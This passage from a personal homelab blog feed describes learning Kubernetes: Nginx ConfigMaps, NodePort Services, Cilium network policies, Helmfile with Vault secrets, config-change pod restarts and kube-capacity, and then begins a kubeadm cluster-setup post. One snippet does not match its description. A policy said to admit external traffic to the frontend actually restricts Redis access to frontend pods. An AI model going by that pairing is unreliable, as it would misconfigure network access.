pods are not automatically restarted to take the new configuration into account.
This is a bit annoying, to be honest, because it&rsquo;s something which Nomad does
out of the box, at least for certain ways of writing job files.
The solution I found for this (at least while working with pure <code>kubectl</code>;
with Helm, the problem can be solved more elegantly) was to just run <code>kubectl rollout restart deployment &lt;NAME&gt;</code>.</p>
<p>Next up was a small tutorial setting up a Service for the first time <a href="https://kubernetes.io/docs/tutorials/services/connect-applications-service/">with Nginx</a>.
At first I had a little problem with this one, because I had written the
ConfigMap for it like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nginxconfigmap</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/name</span>: <span style="color:#ae81ff">nginx</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/component</span>: <span style="color:#ae81ff">webserver</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">connecting-apps</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">usage</span>: <span style="color:#ae81ff">tutorials</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">default</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    server {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            listen 80 default_server;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            listen [::]:80 default_server ipv6only=on;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            listen 443 ssl;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            root /usr/share/nginx/html;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            index index.html;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            server_name localhost;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            ssl_certificate /etc/nginx/ssl/tls.crt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            ssl_certificate_key /etc/nginx/ssl/tls.key;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            location / {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                    try_files $uri $uri/ =404;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }</span>
</span></span></code></pre></div><p>As a consequence, nothing came up in the Nginx container, but I also wasn&rsquo;t
getting any error messages in the logs. So I first assumed that something was
wrong with the Service setup, because I was getting &ldquo;Connection refused&rdquo; errors.
But it turns out I just didn&rsquo;t understand the ConfigMap semantics correctly.
The keys under the <code>data:</code> key are actual filenames. So in the setup above,
I was adding a file just called <code>default</code> and mounting it into the Nginx conf
directory. But in the main Nginx config, only files with the <code>.conf</code> extension
are automatically included from the config snippet dir. But because there wasn&rsquo;t
anything malformed about the config, I was simply getting an Nginx instance
without a server block, instead of some sort of error message. Just changing
that <code>default:</code> key to <code>default.conf:</code> fixed the issue.</p>
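<p>An easy way to see this in action (the deployment name and mount path are just the tutorial&rsquo;s values as far as I remember, so treat them as placeholders) is to list the mounted directory:</p>
<pre tabindex="0"><code># Show which files the ConfigMap actually produced inside the container
kubectl exec deploy/my-nginx -- ls /etc/nginx/conf.d
# With the key named "default" this lists a file called "default", which the
# default include pattern (*.conf) silently ignores; "default.conf" gets picked up.
</code></pre>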
<p>This was also the first service I made available outside the cluster, using a
<code>NodePort</code> type service. It looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">connecting-apps-nginx</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/name</span>: <span style="color:#ae81ff">nginx</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/component</span>: <span style="color:#ae81ff">webserver</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">connecting-apps</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">usage</span>: <span style="color:#ae81ff">tutorials</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">NodePort</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">port</span>: <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">port</span>: <span style="color:#ae81ff">443</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">https</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/name</span>: <span style="color:#ae81ff">nginx</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/component</span>: <span style="color:#ae81ff">webserver</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">connecting-apps</span>
</span></span></code></pre></div><p>This service listens on two random ports on every single Kubernetes node. If
packets arrive on those random ports, they are then forwarded to the Pod running
Nginx.
At first, I thought this would be the way I would run my Traefik ingress
later on, but then I realized that while you can configure an explicit port for
NodePort services, by default it has to lie in the 30000-32767 range.</p>
<p>Next, I had a look at an example <a href="https://docs.cilium.io/en/stable/gettingstarted/demo/">from Cilium</a>,
to get more comfortable with Network Policies. In this example, you launch a
number of Star Wars themed services, deciding docking permissions for the Death
Star. This is simulated with CiliumNetworkPolicy objects and was pretty good
at teaching me the basics there. I&rsquo;m especially interested in NetworkPolicy as
a network connection permission mechanism. In my Nomad cluster, I&rsquo;m using
Consul Connect to control the connections between different services, deciding
who can connect to who, and I wanted something similar in Kubernetes.
<a href="https://kubernetes.io/docs/concepts/services-networking/network-policies/">NetworkPolicies</a>
do exactly that, and this nice Star Wars demo from Cilium demonstrated that.</p>
<p><a href="https://kubernetes.io/docs/tutorials/stateless-application/guestbook/">The last tutorial</a>
was more of an &ldquo;all-in-one&rdquo; deal with a lot more complexity, connecting several
services to each other. I made it even more interesting by instituting a deny-all
network policy on the &ldquo;default&rdquo; namespace. As a consequence, I needed to
make sure both that the Redis pods could talk to each other for replication
and that the PHP frontend could talk to the Redis pods. After having just finished
the Cilium demo, that part was pretty simple. What I overlooked completely:
I also had to explicitly allow traffic from outside the cluster to reach the
frontend, which I could do with a policy like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;guestbook-redis-allow&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/name</span>: <span style="color:#ae81ff">guestbook-redis-allow</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">guestbook</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">usage</span>: <span style="color:#ae81ff">tutorial</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;L3-L4 policy to restrict redis access to frontend only&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/name</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/component</span>: <span style="color:#ae81ff">key-value-store</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">guestbook</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/name</span>: <span style="color:#ae81ff">guestbook</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/component</span>: <span style="color:#ae81ff">frontend</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">guestbook</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">toPorts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">port</span>: <span style="color:#e6db74">&#34;6379&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span></code></pre></div><p>Without this, Cilium dutifully blocks all external traffic coming in via the
NodePort service I had configured for the tutorial.</p>
<h1 id="how-to-handle-all-those-manifests">How to handle all those manifests?</h1>
<p>While doing the tutorials, I started wondering how to handle all of those
YAML files in some better way than running <code>kubectl apply</code> for every one of
them. At first I looked at Helm, which already looked more like what I wanted.
But then somebody on Mastodon mentioned <a href="https://helmfile.readthedocs.io/en/latest/">Helmfile</a>.
This also uses Helm in the background, but has a central config file to combine
all the things I&rsquo;ve currently got deployed in my cluster, and it allows
deployment of all of it with a single command. Exactly what I was looking for.</p>
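<p>Day-to-day use then boils down to a handful of commands; a quick sketch (the <code>diff</code> subcommand needs the helm-diff plugin installed):</p>
<pre tabindex="0"><code># Show what would change compared to what is currently deployed
helmfile diff
# Render and apply every release declared in helmfile.yaml in one go
helmfile apply
# Or skip the diffing and just sync everything unconditionally
helmfile sync
</code></pre>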
<p>Currently, with Traefik Ingress I set up myself, and using the <a href="https://rook.io/">Ceph Rook</a>
Helm chart, my Helmfile looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">repositories</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-release</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">url</span>: <span style="color:#ae81ff">https://charts.rook.io/release</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">releases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-rook-operator</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">rook-release/rook-ceph</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">v1.12.5</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-ceph</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./value-files/rook-operator.yaml</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-rook-cluster-internal</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">rook-release/rook-ceph-cluster</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">v1.12.5</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-ceph-cluster-internal</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./value-files/rook-ceph-cluster-internal.yaml</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">traefik</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">./traefik</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">appVersion</span>: <span style="color:#e6db74">&#34;v2.10.4&#34;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">meiHomeNetCert</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">chain</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            {{- &#34;ref+vault://secret/cert#/foo&#34; | fetchSecretValue | nindent 12 }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            {{- &#34;ref+vault://secret/cert#/bar&#34; | fetchSecretValue | nindent 12 }}</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">basicAuthAdminPw</span>: {{ <span style="color:#e6db74">&#34;ref+vault://secret/traefik/auth/baz#/pw&#34;</span> <span style="color:#ae81ff">| fetchSecretValue }}</span>
</span></span></code></pre></div><p>This format has several nice features. Each entry in the <code>releases</code> array is a
different Helm chart. As you can see, for the Ceph Rook charts I use the official
sources, while the Traefik chart comes from a local directory as I wrote it
myself. I will write separate blog posts about both, Traefik as Ingress and
Ceph Rook.
Besides defining which charts to apply, you can also centrally define the
namespaces and values. Here I&rsquo;m using two different ways of defining values
for the Helm charts. For the Ceph Rook deployments, I&rsquo;m using separate value
files, because they need a lot of config. But Traefik&rsquo;s values I just define
directly inside the Helmfile.</p>
<p>Another big plus is Helmfile&rsquo;s ability to get secrets from Vault, which
I use here to get at my Let&rsquo;s Encrypt certs.</p>
<p>That makes two levels of templating: Helmfile&rsquo;s own, and then Helm&rsquo;s to generate the
actual manifests.</p>
<p>While working on this and complaining a bit on Mastodon about the fact that Pods
are not restarted when the config file changes, I was pointed towards
a neat trick which can be applied when deploying with Helm. This trick uses the
fact that when an annotation of a Pod changes, the Pod is automatically redeployed.</p>
<p>Let&rsquo;s say we have a Deployment with a <code>spec.template</code> like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/name</span>: <span style="color:#e6db74">&#34;traefik&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/static-conf</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/static-conf.yml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">traefik</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">traefik:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">static-conf</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#e6db74">&#34;/etc/traefik&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">static-conf</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">traefik-static-conf</span>
</span></span></code></pre></div><p>And then we have a ConfigMap like this at <code>templates/static-conf.yml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">traefik-static-conf</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/name</span>: <span style="color:#e6db74">&#34;traefik&#34;</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">traefik.yml</span>: <span style="color:#ae81ff">|</span>
</span></span><span style="display:flex;"><span>{{ <span style="color:#ae81ff">tpl (.Files.Get &#34;configs/static.yml&#34;) . | indent 4 }}</span>
</span></span></code></pre></div><p>Then, whenever this ConfigMap, or the <code>configs/static.yml</code> referenced in the
<code>tpl</code> function, change content, the annotation on the Deployment&rsquo;s template
also changes, and the Pod is redeployed. This way, the Pod is automatically
restarted when the config file is changed.</p>
<p>You can also see another nice point about using Helmfile, at least with local
Helm charts you create yourself: I can define central, common labels once and have
them set on all resources.</p>
<h1 id="secrets">Secrets</h1>
<p>One little story about Secrets I need to tell here: I got myself utterly
confused about how Secrets work. For some reason, I got it into my head for
several days that with Secrets being stored just in plain text (okay, base64
encoded), they were a security risk. Going from that, I also felt that things like
<a href="https://external-secrets.io/latest/">external-secrets</a> wouldn&rsquo;t add anything -
yes, it takes the secrets from e.g. Vault, but then they are again stored
unencrypted in the cluster.</p>
<p>But of course that&rsquo;s a misconception. Secrets cannot just randomly be accessed
by anything running in a Kubernetes cluster, which was my initial impression. They
require access via the Kubernetes API server, which can be controlled via
<a href="https://kubernetes.io/docs/reference/access-authn-authz/rbac/">RBAC</a>. So for
now at least, I decided to rely on Helmfile&rsquo;s <a href="https://github.com/helmfile/vals">Vals</a>
to extract the secrets from Vault at deployment time. This just looks simpler
than setting up e.g. external-secrets.
I also see a security advantage here, albeit a small one, because I don&rsquo;t need to
configure anything with broad access to my Vault instance in the cluster. Instead,
I can rely on Vault&rsquo;s login mechanisms on my Command and Control host, which
use time-limited tokens and such.</p>
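<p>To give a rough idea of the workflow (the address, auth method and username here are placeholders, not my actual setup), a deployment then looks something like this:</p>
<pre tabindex="0"><code># Log in on the deploying host; by default this stores a short-lived token in ~/.vault-token
export VAULT_ADDR="https://vault.example.net:8200"
vault login -method=userpass username=deployer
# Expose the token via the standard environment variable so vals can pick it up
export VAULT_TOKEN="$(cat ~/.vault-token)"
# Helmfile/vals now resolve the ref+vault:// references while rendering the values
helmfile apply
</code></pre>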
<h1 id="showing-cluster-resource-usage">Showing cluster resource usage</h1>
<p>I had also been looking the whole time for some place where I could see how much capacity
I still had free in my experimental cluster. This is something which Nomad has
baked into its web UI, but Kubernetes does not have anything like it out of the
box.</p>
<p>I was finally pointed towards <a href="https://github.com/robscott/kube-capacity">kube-capacity</a>,
a kubectl plugin. It does exactly what I wanted, telling me how much free capacity
I still have left on the cluster and individual node level. The output looks
something like this at the moment:</p>
<pre tabindex="0"><code>kubectl resource-capacity
NODE     CPU REQUESTS   CPU LIMITS     MEMORY REQUESTS   MEMORY LIMITS
*        17600m (44%)   31100m (77%)   27551Mi (58%)     46408Mi (98%)
mehen    2150m (53%)    3000m (75%)    1524Mi (43%)      3472Mi (98%)
mesta    1950m (48%)    3000m (75%)    1384Mi (39%)      3132Mi (88%)
min      1950m (48%)    3000m (75%)    1384Mi (39%)      3132Mi (88%)
nakith   4450m (74%)    9300m (155%)   9660Mi (87%)      15008Mi (136%)
naunet   5350m (89%)    9900m (165%)   10472Mi (95%)     16032Mi (145%)
sait     950m (11%)     1200m (15%)    1619Mi (22%)      2560Mi (35%)
sehith   800m (10%)     1700m (21%)    1508Mi (20%)      3072Mi (42%)
</code></pre><p>This shows me that all of my current Pods&rsquo; requests together use 44% of the
available CPU capacity and 58% of the memory capacity. It has already been
pretty useful for figuring out why I wasn&rsquo;t able to deploy all of my Ceph Rook
pods, for example.</p>
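<p>In case you want to try it yourself: as far as I can tell, the easiest way to install it is as a kubectl plugin via krew, where it goes by the name <code>resource-capacity</code>:</p>
<pre tabindex="0"><code># Install the plugin via krew (assuming krew itself is already set up)
kubectl krew install resource-capacity
# Afterwards it is available as shown above
kubectl resource-capacity
</code></pre>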
<h1 id="thanks-to-the-homelabbers-in-the-fediverse">Thanks to the Homelabbers in the Fediverse</h1>
<p>Kubernetes is a pretty complex topic, as I have now found out. There are a lot
of pitfalls and great tools to avoid them which I might never have found just
from Googling. The Fediverse homelabbing community has been extremely helpful
in pointing me in the right direction multiple times, e.g. in recommending
Helmfile and kube-capacity to me.</p>
<p>Thanks everyone! &#x1f642;</p>
]]></content:encoded>
    </item>
    <item>
      <title>KubeExp: Setting up the cluster</title>
      <link>https://blog.mei-home.net/posts/kubernetes-cluster-setup/</link>
      <pubDate>Sat, 07 Oct 2023 00:05:34 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/kubernetes-cluster-setup/</guid>
      <description>Setting up a bare-metal cluster with Cilium and kubeadm</description>
      <content:encoded><![CDATA[<p>After setting up my lab environment in the <a href="https://blog.mei-home.net/posts/kubernetes-lab-setup/">previous article</a>,
I&rsquo;ve now also set up the Kubernetes cluster itself, with <a href="https://kubernetes.io/docs/reference/setup-tools/kubeadm/">kubeadm</a>
as the setup tool and <a href="https://cilium.io/">Cilium</a> as the CNI plugin for
networking.</p>
<p>Here, I will describe why I chose the tools I did, and how I initialized the
cluster, as well as how to remove the cluster when necessary.</p>
<h1 id="tools-choice">Tools choice</h1>
<p>Before setting up a cluster, several choices need to be made. The first one in
the case of Kubernetes is which distribution to use.</p>
<p>The first option, and the one I chose, is &ldquo;vanilla&rdquo; k8s. This is the default distribution,
with full support for all the related standards and functionality.</p>
<p>Another well-liked one is <a href="https://k3s.io/">k3s</a>, which bills itself as a
lightweight distribution. Its most distinguishing feature seems to be the
fact that its control plane comes along as a single binary, instead of an entire
set, as in the case of vanilla k8s.
Also in contrast to k8s, it uses a simple SQLite database as a storage backend
for cluster data, instead of a full <code>etcd</code> cluster.
It also falls into the &ldquo;opinionated&rdquo; part of the tech spectrum. Instead of
telling you to make a choice on things like CNI and CRI, it already comes
with some options out of the box. Flannel is pre-chosen as a CNI plugin,
while e.g. Traefik is already set up as an <a href="https://kubernetes.io/docs/concepts/services-networking/ingress-controllers/">Ingress Controller</a>.</p>
<p>If you want to go even further from vanilla, there&rsquo;s also things like
<a href="https://www.talos.dev/">Talos Linux</a>. It&rsquo;s an entire Linux distro made with
only one goal: Running a Kubernetes cluster. It doesn&rsquo;t even allow you to
SSH into it.</p>
<p>For now, I will stay with vanilla k8s, which I will install with <code>kubeadm</code>. Simply
because I like making the &ldquo;vanilla&rdquo; experience my first contact with some tech.
I also prefer being forced to make my own decisions on tools, so that I am forced
to inform myself about the alternatives. Once I&rsquo;ve completed my current experimentation,
I will likely at least take another look at Talos Linux. Its premise sounds quite
interesting, especially with the declarative config files, but the &ldquo;no SSH&rdquo;
part honestly still feels somewhat weird to me.</p>
<p>The next choice to be made is the <a href="https://kubernetes.io/docs/concepts/architecture/cri/">CRI</a>,
the container runtime. The only thing I knew going into this is that I did not
want to go with <em>Docker</em>. Too many bad experiences with memory leaks and other
shenanigans with their daemon. After some research, my choice fell on
<a href="https://cri-o.io/">CRI-O</a>. To be honest, mostly because it bills itself as
a container engine focused on use with Kubernetes.</p>
<p>Next is the <a href="https://kubernetes.io/docs/concepts/extend-kubernetes/compute-storage-net/network-plugins/">CNI plugin</a>.
This is the piece of the Kubernetes stack which controls networking, most
importantly inter-Pod networking. This is where I had the hardest time choosing.
The websites of all of them are chock-full of buzzwords. eBPF! It&rsquo;s better than
sliced bread! &#x1f612; In the end, my decision was between <a href="https://cilium.io/">Cilium</a>
and <a href="https://www.tigera.io/project-calico/">Calico</a>. The one thing I was really
interested in and I definitely wanted was <a href="https://kubernetes.io/docs/concepts/services-networking/network-policies/">Network Policies</a>. Those allow defining rules for inter-Pod connectivity,
letting me control which Pods can talk to each other. I like having this
for the sake of security, so that e.g. only the apps which actually need a DB
can talk to the Postgres pod.
In my current HashiCorp Nomad based cluster, I&rsquo;ve got something similar using
Consul&rsquo;s service mesh.
One more thing I find pretty nice is that both Calico and Cilium support
encryption. This was another reason why I started using Consul: It provides
me with encrypted network traffic, without me having to set up TLS certs for
each individual service.
In the end, even after reading through most of the docs for both Calico and Cilium,
I didn&rsquo;t know which one to choose. So I did the obvious thing:</p>
<figure>
    <img loading="lazy" src="dice.png"
         alt="A picture of a 20 sided dice with the number 16 on the upper face."/> <figcaption>
            <p>When in doubt, just ask Principal Lead Architect Dice for their opinion.</p>
        </figcaption>
</figure>

<p>And that&rsquo;s how I came to use Cilium as the CNI plugin in my cluster. &#x1f605;</p>
<p>Without further ado, let&rsquo;s conjure ourselves a Kubernetes cluster. &#x1f913;</p>
<h1 id="preparing-the-machines">Preparing the machines</h1>
<p>Before we can actually call <code>kubeadm init</code>, we need to install the tools on the
machines and do some additional config. For most of the setup, I followed the
<a href="https://kubernetes.io/docs/setup/production-environment/tools/kubeadm/">official Kubernetes kubeadm docs</a>.</p>
<p>Before installing the tools, a couple of config options need to be set on the
machines, defined <a href="https://kubernetes.io/docs/setup/production-environment/container-runtimes/#forwarding-ipv4-and-letting-iptables-see-bridged-traffic">here</a>.</p>
<p>I configured the options using Ansible:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">load overlay kernel module</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kernel</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">community.general.modprobe</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">overlay</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">persistent</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">load br_netfilter kernel module</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kernel</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">community.general.modprobe</span>:
